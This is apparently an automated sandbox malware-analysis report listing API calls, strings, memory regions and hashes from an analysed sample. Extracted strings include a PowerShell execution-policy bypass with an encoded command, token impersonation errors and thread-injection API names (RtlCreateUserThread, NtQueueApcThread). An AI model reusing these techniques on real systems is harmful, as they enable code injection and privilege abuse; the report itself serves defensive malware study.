                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                                            • String ID: %s\%s
                                            • API String ID: 1896346573-4073750446
                                            APIs
                                            • _snprintf.LIBCMT ref: 0076DB25
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                              • Part of subcall function 00776F38: _snprintf.LIBCMT ref: 007770A5
                                            • _snprintf.LIBCMT ref: 0076DBBD
                                              • Part of subcall function 00772170: strchr.LIBCMT ref: 007721D6
                                              • Part of subcall function 00772170: _snprintf.LIBCMT ref: 0077220C
                                              • Part of subcall function 0077200C: strchr.LIBCMT ref: 00772069
                                              • Part of subcall function 0077200C: _snprintf.LIBCMT ref: 007720B3
                                            • _snprintf.LIBCMT ref: 0076DBD4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                                            • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                            • API String ID: 199363273-1250630670
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1640621425-0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1640621425-0
                                            APIs
                                            • malloc.LIBCMT ref: 0076493A
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • malloc.LIBCMT ref: 00764945
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E718
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E71D
                                            • free.LIBCMT ref: 00764A2C
                                            • free.LIBCMT ref: 00764A34
                                            • free.LIBCMT ref: 00764A40
                                            • free.LIBCMT ref: 00764A4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: free$_errno$_callnewhmalloc
                                            • String ID:
                                            • API String ID: 2761444284-0
                                            APIs
                                            • malloc.LIBCMT ref: 007B553A
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • malloc.LIBCMT ref: 007B5545
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF318
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF31D
                                            • free.LIBCMT ref: 007B562C
                                            • free.LIBCMT ref: 007B5634
                                            • free.LIBCMT ref: 007B5640
                                            • free.LIBCMT ref: 007B564D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                            • String ID:
                                            • API String ID: 996410232-0
                                            APIs
                                              • Part of subcall function 007C31F4: strchr.LIBCMT ref: 007C322E
                                              • Part of subcall function 007C31F4: strchr.LIBCMT ref: 007C324C
                                              • Part of subcall function 007C31F4: malloc.LIBCMT ref: 007C3264
                                              • Part of subcall function 007C31F4: malloc.LIBCMT ref: 007C3271
                                              • Part of subcall function 007C31F4: rand.LIBCMT ref: 007C333D
                                            • strchr.LIBCMT ref: 007C2DD6
                                            • _snprintf.LIBCMT ref: 007C2E0C
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                            • _snprintf.LIBCMT ref: 007C2E23
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                            • String ID: %s&%s$?%s
                                            • API String ID: 1095232423-1750478248
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                            • String ID:
                                            • API String ID: 2998201375-0
                                            APIs
                                            • malloc.LIBCMT ref: 0076F085
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • free.LIBCMT ref: 0076F0C0
                                            • fwrite.LIBCMT ref: 0076F101
                                            • fclose.LIBCMT ref: 0076F109
                                            • free.LIBCMT ref: 0076F116
                                              • Part of subcall function 0077E644: _errno.LIBCMT ref: 0077E664
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: _errno$free$_callnewhfclosefwritemalloc
                                            • String ID:
                                            • API String ID: 1696598829-0
                                            APIs
                                            • _errno.LIBCMT ref: 007899FD
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • __doserrno.LIBCMT ref: 007899F5
                                              • Part of subcall function 007810A8: _getptd_noexit.LIBCMT ref: 007810AC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: _getptd_noexit$__doserrno_errno
                                            • String ID:
                                            • API String ID: 2964073243-0
                                            APIs
                                            • _errno.LIBCMT ref: 007DA5FD
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • __doserrno.LIBCMT ref: 007DA5F5
                                              • Part of subcall function 007D1CA8: _getptd_noexit.LIBCMT ref: 007D1CAC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: _getptd_noexit$__doserrno_errno
                                            • String ID:
                                            • API String ID: 2964073243-0
                                            APIs
                                              • Part of subcall function 007753EC: malloc.LIBCMT ref: 00775408
                                            • strrchr.LIBCMT ref: 007752ED
                                            • _snprintf.LIBCMT ref: 0077539B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            • API ID: _snprintfmallocstrrchr
                                            • String ID: Failed to impersonate token: %d$t permissions in process: %d
                                            • API String ID: 3587327836-1492073275
                                            APIs
                                            • CreatePipe.KERNEL32 ref: 007C28A3
                                            • GetStartupInfoA.KERNEL32 ref: 007C28AD
                                            • Sleep.KERNEL32 ref: 007C28F4
                                              • Part of subcall function 007C48D8: GetTickCount.KERNEL32 ref: 007C48F1
                                              • Part of subcall function 007C48D8: GetTickCount.KERNEL32 ref: 007C4932
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: CountTick$CreateInfoPipeSleepStartup
                                            • String ID: h
                                            • API String ID: 1809008225-2439710439
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: AccountInformationLookupToken_snprintf
                                            • String ID: %s\%s
                                            • API String ID: 2107350476-4073750446
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: AddressHandleModuleProc
                                            • String ID: RtlCreateUserThread$ntdll.dll
                                            • API String ID: 1646373207-2935400652
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: AddressHandleModuleProc
                                            • String ID: NtQueueApcThread$ntdll
                                            • API String ID: 1646373207-1374908105
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: AddressHandleModuleProc
                                            • String ID: IsWow64Process$kernel32
                                            • API String ID: 1646373207-3789238822
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: AddressHandleModuleProc
                                            • String ID: Wow64RevertWow64FsRedirection$kernel32
                                            • API String ID: 1646373207-3900151262
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: AddressHandleModuleProc
                                            • String ID: Wow64DisableWow64FsRedirection$kernel32
                                            • API String ID: 1646373207-736604160
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            APIs
                                              • Part of subcall function 007725F4: strchr.LIBCMT ref: 0077262E
                                              • Part of subcall function 007725F4: strchr.LIBCMT ref: 0077264C
                                              • Part of subcall function 007725F4: malloc.LIBCMT ref: 00772664
                                              • Part of subcall function 007725F4: malloc.LIBCMT ref: 00772671
                                              • Part of subcall function 007725F4: rand.LIBCMT ref: 0077273D
                                            • strchr.LIBCMT ref: 007721D6
                                            • _snprintf.LIBCMT ref: 0077220C
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                            • _snprintf.LIBCMT ref: 00772223
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                                            • String ID: not create token: %d
                                            • API String ID: 1095232423-2272930512
                                            APIs
                                            • malloc.LIBCMT ref: 007C4A45
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • htonl.WS2_32 ref: 007C4A5B
                                              • Part of subcall function 007C4C44: PeekNamedPipe.KERNEL32 ref: 007C4C7C
                                            • WaitForSingleObject.KERNEL32 ref: 007C4AB6
                                            • free.LIBCMT ref: 007C4AF2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                                            • String ID:
                                            • API String ID: 2495333179-0
                                            APIs
                                            • _time64.LIBCMT ref: 007CC254
                                              • Part of subcall function 007D145C: GetSystemTimeAsFileTime.KERNEL32 ref: 007D146A
                                              • Part of subcall function 007D044C: _getptd.LIBCMT ref: 007D0454
                                            • malloc.LIBCMT ref: 007CC29C
                                            • strtok.LIBCMT ref: 007CC300
                                            • strtok.LIBCMT ref: 007CC311
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: Timestrtok$FileSystem_getptd_time64malloc
                                            • String ID:
                                            • API String ID: 460628555-0
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0078E9FC
                                              • Part of subcall function 00780A00: _getptd.LIBCMT ref: 00780A16
                                              • Part of subcall function 00780A00: __updatetlocinfo.LIBCMT ref: 00780A4B
                                              • Part of subcall function 00780A00: __updatetmbcinfo.LIBCMT ref: 00780A72
                                            • _errno.LIBCMT ref: 0078EA08
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 0078EA13
                                            • strchr.LIBCMT ref: 0078EA29
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                            • String ID:
                                            • API String ID: 4151157258-0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            • API ID: clock
                                            • String ID:
                                            • API String ID: 3195780754-0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            • API ID: clock
                                            • String ID:
                                            • API String ID: 3195780754-0
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007DF5FC
                                              • Part of subcall function 007D1600: _getptd.LIBCMT ref: 007D1616
                                              • Part of subcall function 007D1600: __updatetlocinfo.LIBCMT ref: 007D164B
                                              • Part of subcall function 007D1600: __updatetmbcinfo.LIBCMT ref: 007D1672
                                            • _errno.LIBCMT ref: 007DF608
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007DF613
                                            • strchr.LIBCMT ref: 007DF629
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                            • String ID:
                                            • API String ID: 4151157258-0
                                            APIs
                                            • accept.WS2_32 ref: 007CEF71
                                            • send.WS2_32 ref: 007CEFAF
                                            • send.WS2_32 ref: 007CEFC3
                                            • closesocket.WS2_32 ref: 007CEFD4
                                              • Part of subcall function 007CF098: closesocket.WS2_32 ref: 007CF0A4
                                              • Part of subcall function 007CF098: free.LIBCMT ref: 007CF0AE
                                              • Part of subcall function 007CF098: free.LIBCMT ref: 007CF0B7
                                              • Part of subcall function 007CF098: free.LIBCMT ref: 007CF0C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            • API ID: free$closesocketsend$accept
                                            • String ID:
                                            • API String ID: 47150829-0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$NamedPeekPipeSleep
                                            • String ID:
                                            • API String ID: 1593283408-0
                                            • Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                            • Instruction ID: 6311e74ae0b42aa8aa7b814ac48dd4174b72cfca121611b360ea0cde81339702
                                            • Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
                                            • Instruction Fuzzy Hash: 82F0A432618E90C2E7148B25F84471AA3A9F788B81F644128EB8D82A65EF3DD5C28B05
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$NamedPeekPipeSleep
                                            • String ID:
                                            • API String ID: 1593283408-0
                                            • Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                            • Instruction ID: 32d3647d56aa391de904bdd09a327b3fe9feffb39ee4db4619f4ab1fd5ba88d9
                                            • Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
                                            • Instruction Fuzzy Hash: 1EF0C832A18A9183F7108B15F85471BB7B5F7C9B94F644128DB8943A75DF3DC882CB04
                                            APIs
                                            • InitializeProcThreadAttributeList.KERNEL32 ref: 007C770E
                                            • GetProcessHeap.KERNEL32 ref: 007C7714
                                            • HeapAlloc.KERNEL32 ref: 007C7724
                                            • InitializeProcThreadAttributeList.KERNEL32 ref: 007C773F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                                            • String ID:
                                            • API String ID: 1212816094-0
                                            • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                            • Instruction ID: 6ecf861463d60d2f010408bc7ff46dfc7d6251e1cbc446479edfebd718935ab9
                                            • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                            • Instruction Fuzzy Hash: 4FF02B2672968882DB488B35F44175A63A4EB8CB90F59542DFA0F42724CE3CC445CF00
                                            APIs
                                            • closesocket.WS2_32 ref: 007CF0A4
                                            • free.LIBCMT ref: 007CF0AE
                                              • Part of subcall function 007CF244: HeapFree.KERNEL32 ref: 007CF25A
                                              • Part of subcall function 007CF244: _errno.LIBCMT ref: 007CF264
                                              • Part of subcall function 007CF244: GetLastError.KERNEL32 ref: 007CF26C
                                            • free.LIBCMT ref: 007CF0B7
                                            • free.LIBCMT ref: 007CF0C0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                                            • String ID:
                                            • API String ID: 1525665891-0
                                            • Opcode ID: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                            • Instruction ID: ac185cc5669652c4561bda81659917c917849fc1b99d393f86448571d66200f5
                                            • Opcode Fuzzy Hash: 514671407b84a75ab4a957943dd5047acaa779434bbb8d29509bbfd64e64c7a5
                                            • Instruction Fuzzy Hash: C7D06726614444C1DF14FBB2D8AA72C1721F798F94F140039DE1E8B265CD6CC895C344
                                            Strings
                                            • Unknown pseudo relocation bit size %d., xrefs: 00402294
                                            • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                            • API String ID: 0-395989641
                                            • Opcode ID: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                                            • Instruction ID: 8c8005ec778b1d8b89afdaa8f366cc80ce98c81ac44c8c214e0d273334ccb7fd
                                            • Opcode Fuzzy Hash: 46b8cc2d54abce7c7c7d07232f07b04759b4e10a12a30095010051897671b5f5
                                            • Instruction Fuzzy Hash: 1A711276B10B9487DB20CF61DA4875A7761FB59BA8F54822AEF08277E8DB7CC540C608
                                            APIs
                                            Strings
                                            • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: QueryVirtual
                                            • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                            • API String ID: 1804819252-157664173
                                            • Opcode ID: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                                            • Instruction ID: 3b33824f85b17f90b3a42b000daced5dafaf341a27cace3064c240a44d9835c1
                                            • Opcode Fuzzy Hash: 4222c966f1866e0347074a23eb8cec22519ab6179e0d58ab4d36e181926c5116
                                            • Instruction Fuzzy Hash: C43106B3701A41A6EB128F12ED417593761B755BEAF48413AEF0C173A1EB3CD986C788
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: __set_app_type
